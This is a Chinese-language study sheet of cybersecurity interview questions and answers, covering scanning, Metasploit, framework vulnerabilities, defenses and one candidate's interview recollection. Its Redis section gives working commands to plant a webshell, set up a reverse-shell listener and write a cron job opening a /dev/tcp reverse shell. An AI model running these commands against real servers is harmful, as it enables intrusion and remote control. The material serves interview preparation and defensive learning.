HMM 模型，类似于白名单，不同点在于可对正常请求自动化建立模型，从而通过正常模型找出不匹配者则为异常请求
借助日志分析工具，如 LogForensics 腾讯实验室
链接

设备出现了误报如何处置（日志）

先去查看设备的完整流量日志等信息。在护网过程中如果确实存在异常流量应当及时进行上报，确认是误报后做好事件记录

nmap 扫描基础命令

sT TCP (全)连接扫描，准确但留下大量日志记录
-sS TCP SYN (半)扫描，速度较快，不会留下日志
-sN null 扫描，标志位全为 0，不适用 Windows
-sF FIN 扫描，标志位 FIN=1，不适用 Windows
-O 查看目标主机系统版本
-sV 探测服务版本
-A 全面扫描

你还用过其他态势感知的产品吗？

ips，ids，hids，堡垒机等

命令行工具用的什么比较多

xshell、xftp、finalshell

你用过微步吗？

微步在线是一个威胁情报中心，可以通过 ip 或域名查询其是不是恶意的，对于判断恶意链接具有一定的参考性，他还有一个插件可以在页面选中就能进行查询，还是一个比较好用的工具

横向越权漏洞的修复

横向越权：横向越权指的是攻击者尝试访问与他拥有相同权限的用户的资源

纵向越权：纵向越权指的是一个低级别攻击者尝试访问高级别用户的资源

对于纵向越权，我们可以通过设置用户角色，为不同的角色提供不同的权限来避免

为了防止横向越权，我们可以使用缓存来进行辅助，当登录成功或者进行操作时，我们在缓存中存储一对由用户名和一个唯一的数字组成的数据（token），然后返回放入的唯一数据在重置密码时我们的参数不仅需要用户名和密码还需要前面生成的唯一数字，根据用户名在缓存中取出对应的数字，如果取出的数字和参数中传入的想等，则证明重置的当前用户的密码，否则不是，且不予以重置

如何反爬

后台对访问进行统计，如果单个 IP 访问超过阈值，予以封锁
后台对访问进行统计，如果单个 session 访问超过阈值，予以封锁
后台对访问进行统计，如果单个 userAgent 访问超过阈值，予以封锁

网页状态码

403 （禁止）服务器拒绝请求。
404 （未找到）服务器找不到请求的网页。
301 （永久移动）请求的网页已永久移动到新位置。服务器返回此响应（对 GET 或 HEAD 请求的响应）时，会自动将请求者转到新位置。
302 （临时移动）服务器目前从不同位置的网页响应请求，但请求者应继续使用原有位置来进行以后的请求。
500 （服务器内部错误）服务器遇到错误，无法完成请求。
501 （尚未实施）服务器不具备完成请求的功能。例如，服务器无法识别请求方法时可能会返回此代码。
502 （错误网关）服务器作为网关或代理，从上游服务器收到无效响应。
503 （服务不可用）服务器目前无法使用（由于超载或停机维护）。通常，这只是暂时状态。
504 （网关超时）服务器作为网关或代理，但是没有及时从上游服务器收到请求。
505 （HTTP 版本不受支持）服务器不支持请求中所用的 HTTP 协议版本。

PHP一句话木马

常见OA系统？

PHP：通达OA、泛微 Eoffice
Java：泛微OA/云桥、致远OA、蓝凌OA、用友OA
ASP：启莱OA

Powershell了解过吗？

简介

PowerShell 是一种命令行外壳程序和脚本环境，主要用于Windows计算机方便管理员进行系统管理并有可能在未来取代Windows上的默认命令提示符。PowerShell脚本因其良好的功能特性常用于正常的系统管理和安全配置工作。

使用

常见的操作 pwd   ls   cd   mkdir   rm

get-process获取所有进程信息

get-date获取当前时间信息

get-host获取当前主机信息

然后就是使用PowersSploit(基于Powershell的后渗透框架软件，包括了很多Power shell攻击脚本，主要用于渗透中的信息收集，权限提升，权限维持)的时候在Powshell上使用过一些下载和运行攻击脚本的命令。

MSF是什么？知道怎么使用吗？

简介：

Metasploit Framework(MSF)是一款开源安全漏洞检测工具，附带数千个已知的软件漏洞，并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程。

模块：

Auxiliary（辅助模块）
为渗透测试信息搜集提供了大量的辅助模块支持
Exploits（攻击模块）
利用发现的安全漏洞或配置弱点对远程目标系统进行攻击，从而获得对远程目标系统访问权的代码组件。
Payload（攻击载荷模块）
攻击成功后促使靶机运行的一段植入代码
Post （后渗透攻击模块）
收集更多信息或进一步访问被利用的目标系统
Encoders（编码模块）
将攻击载荷进行编码，来绕过防护软件拦截

使用：

首先利用Auxiliary辅助探测模块扫描，嗅探，指纹识别相关漏洞，然后确认漏洞存在使用Exploit漏洞利用模块对漏洞进行利用，包括设置payload攻击载荷，设置本机监听等等。漏洞利用成功目标主机就会通过设置的端口主动连接，产生会话。进而可以进行后渗透。

功能：

木马免杀，抓取用户密码，关闭杀毒软件，屏幕截图，新建账号，远程登录，迁移进程，提权操作，网络嗅探，端口转发，内网代理，内网扫描，生成后门，清除日志等等。

常见的框架漏洞？

log4j远程代码执行漏洞

原理：

在正常的log处理过程中对**${**这两个紧邻的字符做了检测，一旦匹配到类似于表达式结构的字符串就会触发替换机制，将表达式的内容替换为表达式解析后的内容，而不是表达式本身，从而导致攻击者构造符合要求的表达式供系统执行

Fastjson反序列化漏洞

判断：

正常请求是get请求并且没有请求体，可以通过构造错误的POST请求，即可查看在返回包中是否有fastjson这个字符串来判断。

原理：

无回显怎么办：

1.一种是直接将命令执行结果写入到静态资源文件里，如html、js等，然后通过http访问就可以直接看到结果
2.通过dnslog进行数据外带，但如果无法执行dns请求就无法验证了
3.直接将命令执行结果回显到请求Poc的HTTP响应中

Shiro反序列化漏洞

原理：

判断：

1.数据返回包中包含rememberMe=deleteMe字段。

2.直接发送原数据包，返回的数据中不存在关键字可以通过在发送数据包的cookie中增加字段：****rememberMe=然后查看返回数据包中是否存在关键字。

shiro-550：

shiro反序列化漏洞利用有两个关键点，首先是在shiro<1.2.4时，AES加密的密钥Key被硬编码在代码里，只要能获取到这个key就可以构造恶意数据让shiro识别为正常数据。另外就是shiro在验证rememberMe时使用了readObject方法，readObject用来执行反序列化后需要执行的代码片段，从而造成恶意命令可以被执行。攻击者构造恶意代码，并且序列化，AES加密，base64编码后，作为cookie的rememberMe字段发送。Shiro将rememberMe进行编码，解密并且反序列化，最终造成反序列化漏洞。

shiro-721：
不需要key，利用Padding Oracle Attack构造出RememberMe字段后段的值结合合法的Remember。

了解过redis数据库和常见的漏洞吗？

答：

redis是一个非关系型数据库，使用的默认端口是6379。常见的漏洞是未授权访问漏洞，攻击者无需认证就可以访问内部数据。利用手段主要有：

1.向root权限账户写入ssh公钥文件，直接免密登录服务器。(受害者redis非root权限运行会报错)

条件：

服务器存在.ssh目录且具有写入的权限

原理：

在数据库中插入一条数据，将本机的公钥作为value，key值随意，然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys，把缓冲的数据保存在文件里，这样就可以在服务器端的/root/.ssh下生成一个授权的key。

2.写入webshell

条件：

已知web绝对路径。

步骤：

redis -cli -h 192.168.x.x 连接目标服务器
config set dir “/var/www/html” 设置保存文件路径
config set dbfilename shell.php 设置保存文件名
set x “\n\n\n” 将webshell写入x键值中
save 保存

局限：

1.服务器处于内网，写入webshell后我们的公网IP无法连接

2.服务器IP地址不固定

3.6379端口不允许入方向

4.上传webshell可能直接被杀毒软件删除

3.反弹连接shell

设置监听端口，常用的工具1.msf 2.netcat 3.socat

利用msf设置监听步骤：

use exploit/multi/handler
set payload generic/shell_reverse_tcp
set lhost 192.168.x.x 默认监听端口为4444
run

4.定时任务反弹shell

步骤：

定时任务用的表达式：Cron表达式是一个字符串，该字符串由6个空格分为7个域，每一个域代表一个时间含义。分时天月周 user-name(用户) command(命令) 比如每过一分钟向root用户的定时任务中写入反弹连接命令

(1) config set dir /var/spool/cron/ //目录切换到定时任务的文件夹中

(2) config set dbfilename root //设置保存文件名

(3)set x “\n * * * * * bash -i >& /dev/tcp/192.168.96.222/7777 0>&1\n” //将反弹shell写入x键值中

(4)save //保存

利用定时任务反弹shell在目标系统是Centos上可用，Ubuntu上有限制

理由如下：

1.默认redis写文件后是644的权限，但ubuntu要求执行定时任务件/var/spool/cron/crontabs/权限必须是600也就是-rw-------才会执行，否则会报错，而Centos的定时任务文件权限644也能执行
2.redis保存RDB会存在乱码，在Ubuntu上会报错，而在Centos上不会报错
3.两个系统的定时任务文件目录不同

利用主从复制getshell

条件：

版本(4.x~5.0.5)

原理：

数据读写体量很大时，为了减轻服务器的压力，redis提供了主从模式，主从模式就是指定一个redis实例作为主机，其余的作为从机，其中主机和从机的数据是相同的，而从机只负责读，主机只负责写。通过读写分离可以减轻服务器端的压力。

利用工具：

RedisRogueServer

地址：

https://github.com/n0b0dyCN/redis-rogue-server

使用工具的命令：

python3 redis-rogue-server.py --rhost=x.x.x.x --lhost=x.x.x.x --exp=exp.so

两种使用方法：

交互式

反弹式

限制：

利用这个方法getshell或者rce任意导致redis服务瘫痪，一般不建议使用

redis未授权访问漏洞的防范措施：

1.添加登录密码

2.修改默认端口

3.关闭端口

4.禁止以root用户权限启动，以低权限启动redis服务

什么是DDoS攻击？如何防御DDoS攻击？

答：DDoS攻击是一种通过向目标网络或服务器发送大量请求流量来使其网络资源饱和的攻击。防御DDoS攻击的方法包括使用负载均衡和防火墙等技术，以及使用CDN和DDoS防护服务等外部防护措施，还可以使用IPS和IDS等内部防护措施。

什么是黑盒和白盒测试？

答：黑盒测试是一种测试方法，测试人员没有访问源代码或内部系统的访问权限。白盒测试是另一种测试方法，测试人员可以访问源代码或内部系统的访问权限。

什么是社交工程攻击？如何预防社交工程攻击？

答：社交工程攻击是一种通过利用人性弱点和社交工具的攻击，如通过网络欺诈和欺骗，获得敏感信息或获得未经授权的访问权限。预防社交工程攻击的方法包括关注网站和邮件上的可疑信息，限制对敏感信息的访问权限，并进行员工网络安全意识教育。

什么是虚拟专用网络（VPN）？如何保护VPN的安全？

答：虚拟专用网络（VPN）是一种加密隧道，通过互联网连接两个或多个设备，并使它们彼此之间相互通信。保护VPN的安全的方法包括使用强密码、定期更换密码、控制VPN文件的访问权限、定期更新VPN软件并启用双因素身份验证等。

什么是DNS欺骗攻击或DNS劫持？

答：DNS欺骗攻击或DNS劫持是指攻击者通过修改DNS查询的响应结果或在DNS服务器上进行欺骗攻击。这可能会导致用户被重定向到恶意网站或无法访问正常网站。预防DNS欺骗攻击的方法包括使用DNSSEC协议或使用可靠的DNS服务器，并保持软件和操作系统更新。

什么是IPS，WAF和CDN的关系？

答：IPS（入侵防护系统）和WAF（Web应用程序防火墙）是一种针对不同级别的网络攻击的安全措施，CDN（内容传输网络）则是一种加速网站网页加载速度的技术。它们都是网络安全策略的一部分，可以一起工作以提供更全面的网络安全保护。

什么是逆向工程？逆向工程常用于哪些

答：逆向工程是指分析和破解技术，方法和代码等的过程，以掌握它们的原理和功能。逆向工程在安全领域常用于软件漏洞攻击和恶意代码分析等方面。

什么是网络钓鱼？如何识别并防范网络钓鱼攻击？

答：网络钓鱼是一种通过邮件或社交媒体等方式向个人或组织发送虚假信息的攻击，以骗取敏感信息或资金。识别和防范网络钓鱼攻击的方法包括使用强密码，不点击可疑链接，不公开个人或公司的敏感信息，并在工作场所提高员工网络安全意识。

什么是网络扫描？如何识别并防范网络扫描攻击？

答：网络扫描是一种通过扫描网络或服务器来收集网络信息和漏洞的攻击。识别和防范网络扫描攻击的方法包括使用防火墙和入侵检测系统来监控网络活动，使用网络安全测试服务来检测和评估网络漏洞，以及保持软件和操作系统更新。

什么是恶意软件？如何防范恶意软件攻击？

答：恶意软件是指通过计算机网络传播并对计算机系统造成破坏或利用个人信息的程序或代码。防范恶意软件攻击的方法包括使用杀毒软件、反病毒软件、防火墙、文件过滤器、电子邮件过滤器和反间谍软件等，同时保持软件和操作系统更新。

什么是物联网（IoT）网络安全？如何提高物联网网络安全？

答：物联网网络安全是指通过保护物联网设备和网络，防止网络攻击对IoT设备和网络造成的风险。提高物联网网络安全的方法包括：使用物联网设备和软件的安全性评估工具；保持IoT设备和网络上的软件更新和补丁；隔离物联网网络的弱点；加强对IOT设备和网络的保护和管控。

什么是企业网络安全政策？如何制订一个有效的网络安全政策？

答：企业网络安全政策是指明确和详细的指导原则和规则，目的是为了保护企业计算机系统和网络的机密性，完整性和可用性。制定一个有效的网络安全政策需要涵盖包括漏洞扫描、密码策略、访问控制、反病毒措施、加密、离职员工计划等规定和措施。

什么是入侵检测系统（IDS）？如何使用IDS提高网络安全？

答：入侵检测系统（IDS）是一种监测网络流量和系统活动的技术，以检测网络安全威胁和攻击。使用IDS可以提高网络安全的方法包括：实时监控网络流量，并识别非法流量；分析网络攻击和安全事件，并提供实时警报；控制网络访问和数据流量，并预防未来的威胁。

什么是加密技术？如何保护数据安全？

答：加密技术是一种将数据转换为基于密码学相似算法的密文来保护数据的技术。保护数据安全的方法有：使用加密技术来加密数据；使用密钥管理系统对密钥进行管理；限制在使用加密数据的时候谁可以访问密钥，并采用其他安全措施，如访问控制和身份验证来保护密钥。

什么是网络安全事件？如何监控和解决网络安全事件？

答：网络安全事件是指在网络系统中出现的任何安全威胁和攻击，如病毒攻击、网络钓鱼、入侵等。监控和解决网络安全事件的方法包括：设置安全监视和警报系统；分析各种安全事件的来源和类型；评估网络安全事件的影响；制定适当的解决方案；并记录网络安全事件以便以后参考。

什么是反病毒软件？如何选择最佳反病毒软件？

答：反病毒软件是一种用于保护计算机系统免受恶意代码、病毒和其他网络安全威胁的软件。选择反病毒软件的最佳方法是通过对多种反病毒软件的功能和服务进行评估，考虑其安全性、易用性、可扩展性和性价比等因素。

17. 什么是安全审计？如何实施安全审计？

答：安全审计是一种监控和评估计算机系统和网络中安全措施有效性的方法。实施安全审计包括确定安全审计目标和范围，收集安全事件和数据，并生成报告以确定安全事件的根本原因和下一步的纠正措施。

18. 什么是网络安全策略？如何制定和实施网络安全策略？

答：网络安全策略是指明确和详细的指导原则和规则，以保护网络系统、应用程序和数据免受网络攻击和安全威胁。制定和实施网络安全策略包括了解企业的安全需求、评估风险、建立和实施安全程序、持续监管，监控和更新网络安全政策、程序和实施细节。

19. 什么是多因素认证？如何使用多因素认证来提高账户安全性？

答：多因素认证是一种需要提供多个验证因素以确认和授权访问的方法。通常包括知识因素（如密码或个人标识号码）、拥有因素（如智能卡或手机）和生物识别因素（如指纹或面部识别）。使用多因素认证可以提高账户的安全性，因为需要更多的验证因素才能访问账户，即使密码被泄露，依然需要其他安全因素。

20. 什么是漏洞管理？如何实施漏洞管理来提高网络安全？

答：漏洞管理是指通过识别、评估和修复计算机系统和网络中存在的漏洞来提高网络安全的过程。实施漏洞管理需要通过收集和审核漏洞报告，对漏洞进行分类和评估来分析其对系统和数据的危害，随后分配修复优先级和时间安排，并实施漏洞修复措施以消除漏洞。

21. 什么是网络安全培训？如何实施网络安全培训来提高组织的网络安全意识？

答：网络安全培训是通过为员工提供有关网络安全的教育和培训来提高组织中员工的网络安全意识和文化。实施网络安全培训需要了解组织网络安全需求、制定培训计划和内容、选择适当的培训方法和资源，如在线培训、模拟攻击、游戏等，并对网络安全培训进行评估和持续更新改进。

22. 如何应对网络安全事件的应急响应？

答：应对网络安全事件的应急响应需要快速、准确地处理安全事件或威胁，并为受影响的系统和数据提供可靠保护。这包括进行威胁分析、暴漏的证据收集、岗位分工、调动资源、制定预案和时间表、实施监控、持续评估和改进网络和数据的安全管理。合理的应急响应计划可以最大限度的减少网络安全事件对组织的影响。

23. 如何保护无线网络的安全性？

答：保护无线网络的安全性可以通过采用如下措施：使用强密码，进行定期更改，启用无线网络加密，限制无线访问权限，升级无线路由器的固件和操作系统，禁止使用广播网络SSIDs，并定期监测无线网络的流量。

24. 如何保护移动设备的网络安全性？

答：保护移动设备的网络安全性可以采取如下措施：档板密码和生物识别技术来保护设备和数据，保证设备的操作系统和应用程序的及时更新，使用加密性的Wi-Fi连接，保护移动设备免受恶意软件和网络攻击的脱离。使用VPN等其他措施来保障移动设备上存储的敏感或机密数据的安全。

25. 什么是人工智能和机器学习在网络安全领域中的应用？

答：人工智能和机器学习在网络安全领域中得到了广泛应用。通过对攻击行为的分析和识别，这种技术可以识别网络攻击，帮助组织采取即使应对措施，提高网络安全防御的能力。另外，机器学习在日益复杂的网络威胁和攻击中也具有预测功能，并且有助于提供更高效的安全处理。机器学习还可以用于日志分析、网络透明化、异常检测、风险管理等领域，帮助组织及时发现潜在的安全威胁、快速响应和恢复。总之，人工智能和机器学习在网络安全方面的应用将会越来越重要，随着技术的不断发展，其应用范围和效果也将会不断提升。

26. 如何有效防范外部攻击？

答：外部攻击的方式多种多样，组织可以通过采取多种措施来防范外部攻击，例如加强网络安全设备、使用强密码和多因素身份验证、定期更新和升级系统和软件，以及禁止使用未授权的设备和应用程序。此外，还可以加强内部培训，提高员工对网络安全的意识和知识水平，以便更好地了解网络攻击的形式和手段，从而更好地防范和应对网络攻击。

27. 如何建立一个安全的网络策略？

答：建立安全的网络策略需要将组织的安全目标和需求与现实情况结合起来，落实到具体的措施和计划中。首先，需要确立网络安全负责人，明确各个部门的安全责任，并措施科学合理的安全管理制度和流程。其次，应该制定完整的、可操作的安全规范和标准，包括密码规范、网络接入规范、操作规范等，以规范员工的行为和操作。最后，要通过稳定可靠的技术措施来防范和应对网络威胁，如入侵检测、安全审计、VPN等，从而形成一个完整的网络安全体系。

28. 如何保护个人电脑的网络安全？

答：保护个人电脑的网络安全需要注意以下几点：首先，定期更新电脑的操作系统和应用程序，关闭不必要的服务和端口；其次，安装杀毒软件、网络安全工具和防火墙，并定期运行扫描和检测；然后，使用强密码并定期更改，禁止使用弱密码以及重复密码；最后，注意在网络上保护个人信息和隐私，避免点击未知来源的链接和附件，并保护个人账户的安全。

29. 如何应对密码泄露？

答：应对密码泄露的方式需要立即更改泄露的密码，包括所有相关的网站和应用程序。建议使用强密码，避免使用常见的密码和重复密码，同时采用两步认证的方式来提高帐户的安全性。另外，还需要注意在电脑上和移动设备上的安全性，定期检查本地的登录记录、应用程序的授权和权限等情况，并保持杀毒软件和更新的操作系统。如果有必要，在发现存在重大的密码泄露后，应当通知网站或应用程序管理员，并申请注销其对应的账户。

30. 如何应对社交工程攻击？

答：社交工程攻击是指攻击者通过利用人性弱点来获取个人信息或者敏感信息，如钓鱼邮件、欺诈电话、假冒社交媒体等手段。为防范社交工程攻击，需要注意以下几点：首先，要保持警惕，不要轻易相信不明来源的电子邮件、消息，不要随意点击其中所包含的链接和附件；其次，要重视密码和帐户的安全性，尤其是使用与个人相关的帐户时，需要使用强密码和双重验证等方式；其次，要时刻关注自身信息的保护，如定期检查个人账户信息是否准确，避免泄露个人信息；同时，应定期进行网络安全培训和意识提高，以提高人员自身的安全意识和识别能力，从而有效防范社交工程攻击。

上来先问了你知道有什么哪些协议类型

传输层协议：
传输控制协议（Transmission Control Protocol，TCP）：提供可靠的、面向连接的数据传输。
用户数据报协议（User Datagram Protocol，UDP）：提供无连接的数据传输，速度较快但不可靠。
网络层协议：
互联网协议（Internet Protocol，IP）：定义了在网络中传输数据的标准方式，负责数据的分组和路由。
应用层协议：
超文本传输协议（Hypertext Transfer Protocol，HTTP）：用于在Web浏览器和服务器之间传输超文本的协议。
文件传输协议（File Transfer Protocol，FTP）：用于在客户端和服务器之间传输文件的协议。
电子邮件协议（Simple Mail Transfer Protocol，SMTP）：用于电子邮件的发送和路由。
域名系统协议（Domain Name System，DNS）：用于将域名转换为IP地址的协议。

然后就又问了解不了解OSI七层模型

OSI七层模型及其功能：

物理层（Physical Layer）：

提供物理介质传输数据的方式，如电缆、光纤和无线信号。
定义了数据的电气特性、物理连接和传输速率等。

数据链路层（Data Link Layer）：

将物理层提供的比特流划分为数据帧（Data Frame）。
提供可靠的数据传输，错误检测和纠正，以及对物理层的错误隔离。

网络层（Network Layer）：

负责在不同网络之间进行数据包的路由和转发。
提供逻辑地址（如IP地址）来唯一标识网络上的设备。

传输层（Transport Layer）：

提供端到端的数据传输服务，确保可靠的数据传输。
建立、维护和终止应用程序之间的数据传输连接。
常用的协议有TCP（传输控制协议）和UDP（用户数据报协议）。

会话层（Session Layer）：

建立、管理和终止应用程序之间的会话。
提供会话控制和同步功能，支持数据交换的检查点和恢复机制。

表示层（Presentation Layer）：

处理数据的表示方式，确保不同系统上的数据可以正确解释。
提供数据的加密、压缩和格式转换等功能。

应用层（Application Layer）：

提供用户接口和服务，支持特定应用程序的网络通信需求。
包括各种应用层协议，如HTTP（超文本传输协议）、FTP（文件传输协议）和SMTP（简单邮件传输协议）等。

接着就又问了网络层有哪些协议

互联网协议（Internet Protocol，IP）：

IP是最基础、最重要的网络层协议，用于在网络中传输数据包。
IPv4是目前广泛使用的版本，而IPv6是其后续版本，为解决IPv4地址耗尽问题而设计。
互联网控制报文协议（Internet Control Message Protocol，ICMP）：

ICMP用于在IP网络中发送错误消息和状态信息。
例如，ICMP可用于发送网络不可达消息或进行网络诊断和故障排除。
地址解析协议（Address Resolution Protocol，ARP）：

ARP用于将IP地址解析为物理硬件地址（如MAC地址）。
当主机需要发送数据包到目标主机时，它需要知道目标主机的MAC地址，ARP就负责进行地址解析。
网际组管理协议（Internet Group Management Protocol，IGMP）：

IGMP用于在多播通信中进行组成员管理。
它使主机能够加入或离开一个多播组，并向路由器发送有关组成员的信息。
网络地址转换协议（Network Address Translation，NAT）：

NAT用于在网络边界上进行IP地址转换。
它允许将内部网络的私有IP地址转换为公共IP地址，以便与Internet通信。
网络控制协议（Network Control Protocol，NCP）：

NCP用于在点对点网络连接中建立和配置网络层参数。
例如，点对点协议（Point-to-Point Protocol，PPP）使用NCP来配置IP地址和其他网络参数。

4、结果他就说user-Agent是什么 Referer是什么哪个显示的是IP地址

User-Agent（用户代理）是一个HTTP请求头部字段，用于标识发起请求的客户端应用程序、操作系统和设备等信息。
Referer（引荐者）是另一个HTTP请求头部字段，用于指示从哪个页面链接跳转或从哪个页面发起了当前请求。
IP地址（Internet Protocol Address）显示的是客户端设备的唯一标识符，用于在网络中标识和定位设备。

6、答完之后又开始拷问我你知道6379是哪个端口吗？

redis，
接着又开始问我了解哪些中间件，
Apache HTTP Server：开源的、跨平台的Web服务器软件。
Nginx：高性能的Web服务器和反向代理服务器。
Microsoft IIS（Internet Information Services）：微软的Web服务器软件。

7、接着又问这些中间件的解析漏洞你了解吗？

添加链接描述

8、接着又问我对CSRF这个漏洞有什么修复建议吗？

9、接着就开始问我除了解析漏洞还了解哪些漏洞

当时就把正式课程教的SQL注入 XSS注入反序列化文件包含命令注入的原理以及类型全说了一遍中间还说了几个关键的函数以及一些自己也做了一些漏洞复现例如：THINKPHP THINKCMF WEBLOGIC的这些远程命令执行漏洞利用，当然还问了修复建议，简单回答就是过滤 + 正则表达式+ 开发人员代码要写的严谨些。

这些问完之后，才开始询问护网的问题了

10、好像首先问的是你有没有护网的经验和应急响应的经验

这个的话如实回答 ,没有参加过护网 , 但是最近有了解过护网并知道一些事件等级以及工作分组，应急响应的话这里有做过，就是回答了一些看看主机有没有异常登录信息(net user) 异常端口开放(netstat -ano) 异常进程(tasklist) 查看一下linux里的/var/log日志 windwos的日志然后根据攻击者的思路去进行一个信息检查用D盾检查一下有没有webshell文件。大致就是回答了这些

11、然后就又让我举个给客户做应急响应的例子

其实还真没咋接触过这一块，但是最近网上看的这些比较多就随便轻描淡写的描述了一下，具体也忘了。。。

总之就是围绕上面回答的措施来描述的，比较片面后面我又解释说，现在是实习生应急响应这一块的话让我接触的比较少，所以就。。。

12、了解一些安全设备吗防火墙啥的

这个的话感觉比较凑巧，昨天网上收集了一些HW的培训资料，然后把内容多看了下，在脑子里大概记了些。

说了一些自己公司的安全设备告警（反弹shell 暴力破解弱口令）之类的。

13、然后就又开始深入询问：假如你现在是研判组的话对于安全设备的告警事件你如何去判断是否为误报的方法和思路

手动验证一下，然后就是根据告警上面的信息去查询，去检验一下

14、知道数据流量分析吗

这里也很迷不知道怎么回答就是简单说了自己用过wireshark 用一些过滤规则去分析数据报文数据包的内容。

15、当你来到现场时首先的一个思路加固方案

根据一些漏洞扫描工具(nessus awvs appscan)扫描出来的漏洞及时反应给他们去修复，然后就是根据等保制度去修改一些中间件的配置和系统的配置文件

16、假如让你写一份写报告说一下思路

这个的话其实也不是很清楚总之脑海里当时就知道（时间地点人物）然后就是围绕这三个回答了时间攻击源地址根据事件类型漏洞类型去划分，最后再根据自己的经验去总结一下写到报告上。

面试难度：难度适中
其他面试